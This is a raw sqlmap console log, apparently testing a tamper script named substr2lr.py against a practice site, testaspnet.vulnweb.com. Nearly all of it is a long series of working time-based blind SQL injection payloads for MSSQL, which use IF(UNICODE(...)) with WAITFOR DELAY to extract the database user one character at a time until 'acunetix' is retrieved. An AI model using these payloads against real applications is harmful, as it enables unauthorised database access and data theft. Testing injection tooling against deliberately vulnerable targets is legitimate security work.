[12:09:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
Test run
root@kali:~# sqlmap -uhttp://testaspnet.vulnweb.com/ReadNews.aspx?id=3 --flush-session --dbms=mssql --tamper=substr2lr.py --current-user -v3
(...snip...)
[12:26:56] [INFO] fetching current user
[12:26:56] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:4'
[12:27:01] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:4'
[12:27:05] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:4'
[12:27:08] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>108) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>106) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>105) WAITFOR DELAY '0:0:4'
[12:27:09] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=105) WAITFOR DELAY '0:0:4'
[12:27:14] [ERROR] invalid character detected. retrying..
[12:27:14] [WARNING] increasing time delay to 5 seconds
[12:27:14] [DEBUG] turning off time auto-adjustment mechanism
[12:27:14] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>64) WAITFOR DELAY '0:0:5'
[12:27:19] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:24] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:25] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))>97) WAITFOR DELAY '0:0:5'
[12:27:26] [PAYLOAD] 3 IF(UNICODE(IIF(1<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1),1),''))!=97) WAITFOR DELAY '0:0:5'
[12:27:27] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:32] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>104) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>100) WAITFOR DELAY '0:0:5'
[12:27:33] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>98) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))>99) WAITFOR DELAY '0:0:5'
[12:27:38] [PAYLOAD] 3 IF(UNICODE(IIF(2<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),2),1),''))!=99) WAITFOR DELAY '0:0:5'
[12:27:39] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>96) WAITFOR DELAY '0:0:5'
[12:27:44] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>112) WAITFOR DELAY '0:0:5'
[12:27:49] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>120) WAITFOR DELAY '0:0:5'
[12:27:50] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>116) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>118) WAITFOR DELAY '0:0:5'
[12:27:55] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))>117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(3<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),3),1),''))!=117) WAITFOR DELAY '0:0:5'
[12:27:56] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:01] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:02] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:07] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>108) WAITFOR DELAY '0:0:5'
[12:28:12] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>110) WAITFOR DELAY '0:0:5'
[12:28:13] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))>109) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(4<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),4),1),''))!=110) WAITFOR DELAY '0:0:5'
[12:28:18] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>104) WAITFOR DELAY '0:0:5'
[12:28:24] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>100) WAITFOR DELAY '0:0:5'
[12:28:29] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>102) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))>101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(5<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),5),1),''))!=101) WAITFOR DELAY '0:0:5'
[12:28:30] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:36] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>120) WAITFOR DELAY '0:0:5'
[12:28:41] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>116) WAITFOR DELAY '0:0:5'
[12:28:42] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>114) WAITFOR DELAY '0:0:5'
[12:28:47] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))>115) WAITFOR DELAY '0:0:5'
[12:28:52] [PAYLOAD] 3 IF(UNICODE(IIF(6<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),6),1),''))!=116) WAITFOR DELAY '0:0:5'
[12:28:53] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>96) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>112) WAITFOR DELAY '0:0:5'
[12:28:58] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>104) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>108) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>106) WAITFOR DELAY '0:0:5'
[12:29:04] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))>105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(7<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),7),1),''))!=105) WAITFOR DELAY '0:0:5'
[12:29:05] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:10] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>112) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>120) WAITFOR DELAY '0:0:5'
[12:29:16] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>116) WAITFOR DELAY '0:0:5'
[12:29:21] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>118) WAITFOR DELAY '0:0:5'
[12:29:27] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))>119) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(8<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),8),1),''))!=120) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>96) WAITFOR DELAY '0:0:5'
[12:29:32] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>48) WAITFOR DELAY '0:0:5'
[12:29:33] [PAYLOAD] 3 IF(UNICODE(IIF(9<=LEFT(LEN((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32)))),2147483647),RIGHT(LEFT((SELECT ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),9),1),''))>1) WAITFOR DELAY '0:0:5'
[12:29:33] [INFO] retrieved: acunetix
[12:29:33] [DEBUG] performed 68 queries in 156.57 seconds
current user: 'acunetix'
[12:29:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[12:29:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testaspnet.vulnweb.com'
[*] shutting down at 12:29:33